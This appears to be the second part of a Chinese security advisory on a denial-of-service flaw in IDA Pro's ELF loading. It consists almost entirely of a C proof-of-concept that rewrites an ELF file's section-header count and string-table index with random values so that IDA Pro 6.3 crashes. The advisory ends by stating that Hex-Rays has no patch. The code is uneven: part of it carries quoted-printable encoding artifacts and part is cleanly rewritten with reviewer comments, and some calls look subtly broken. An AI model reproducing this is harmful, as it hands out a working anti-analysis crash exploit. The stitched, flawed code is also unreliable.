IDA Pro 'ELF'文件远程拒绝服务漏洞(2)

printf("######################################################\n");
printf("#                                                    #\n");
printf("# IDA Pro 6.3 - ELF anti-debugging/reversing patcher #\n");
printf("#                      -nitr0us-                    #\n");
printf("#                                                    #\n");
printf("######################################################\n\n");

if(argc < 2){
fprintf(stderr, "Usage: %s <elf_file_to_patch>\n", argv[0]);
exit(-1);
}

if((fd =3D open(argv[1], O_RDWR)) =3D=3D -1){
perror("open");
exit(-1);
}

if(!isELF(fd)){
close(fd);
exit(-1);
}

// Mapping to memory only the necessary bytes [sizeof(header)]
if((header =3D (Elf32_Ehdr *) mmap(NULL, sizeof(header), PROT_READ | PRO=
T_WRITE, MAP_SHARED, fd, 0)) =3D=3D MAP_FAILED){
perror("mmap");
close(fd);
exit(-1);
}

printf("[*] The ELF file originally has:\n");
printf("[-] Ehdr->e_shnum:    %5d (0x%.4x)\n", header->e_shnum, header->=
e_shnum);
printf("[-] Ehdr->e_shstrndx: %5d (0x%.4x)\n\n", header->e_shstrndx, hea=
der->e_shstrndx);

printf("[*] Patching \"%s\" with new random() values...\n\n", argv[1]);

srand(time(NULL)); // seed for rand()

new_shnum    =3D (Elf32_Half) rand() % 0x1337;
new_shstrndx =3D (Elf32_Half) 0;

while(new_shstrndx < new_shnum)
new_shstrndx =3D (Elf32_Half) rand() % 0xDEAD;

header->e_shnum    =3D new_shnum;
header->e_shstrndx =3D new_shstrndx;

// Synchronize the ELF in file system with the previous memory mapped
if(msync(NULL, 0, MS_SYNC) =3D=3D -1){
perror("msync");
close(fd);
exit(-1);
}

close(fd);
munmap(header, 0);

printf("[*] The patched ELF file now has:\n");
printf("[+] Ehdr->e_shnum:    %5d (0x%.4x)\n", new_shnum, new_shnum);
printf("[+] Ehdr->e_shstrndx: %5d (0x%.4x)\n\n", new_shstrndx, new_shstr=
ndx);

printf("[*] IDA Pro 6.3 should crash trying to load \"%s\"\n", argv[1]);

return 0;
}

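/*
 * isELF - check that the file behind fd begins with a 32-bit,
 * little-endian ELF header.
 *
 * Reads sizeof(Elf32_Ehdr) bytes from the current offset of fd and checks,
 * in order, the magic bytes, the class byte and the data-encoding byte of
 * e_ident.  The read advances the file offset of fd; the descriptor is
 * neither rewound nor closed here.
 *
 * Returns 1 when every check passes, 0 otherwise.  On failure a diagnostic
 * is written to stderr.
 */
int isELF(int fd)
{
    Elf32_Ehdr header;
    ssize_t got;

    got = read(fd, &header, sizeof(header));
    if (got == -1) {
        perror("isELF(): read");
        return 0;
    }

    /*
     * read() may return fewer bytes than requested (for example, a file
     * shorter than the header).  Without this check the comparisons below
     * would inspect uninitialised stack bytes.
     */
    if ((size_t) got < sizeof(header)) {
        fprintf(stderr, "File is too short to contain an ELF header !\n");
        return 0;
    }

    /*
     * magic number verification
     * NOTE(review): e_magic is defined elsewhere in this file; presumably
     * it holds the four ELF magic bytes -- confirm against its definition.
     */
    if (memcmp(header.e_ident, e_magic, 4) != 0) {
        fprintf(stderr, "The argument given is not an ELF file !\n");
        return 0;
    }

    /* 32-bit class verification */
    if (header.e_ident[EI_CLASS] != ELFCLASS32) {
        fprintf(stderr, "Only 32-bit ELF files supported !\n");
        return 0;
    }

    /* little-endian verification */
    if (header.e_ident[EI_DATA] != ELFDATA2LSB) {
        fprintf(stderr, "Only little-endian ELF files supported !\n");
        return 0;
    }

    return 1;
}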

建议:
--------------------------------------------------------------------------------
厂商补丁:

Hex-Rays
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本。
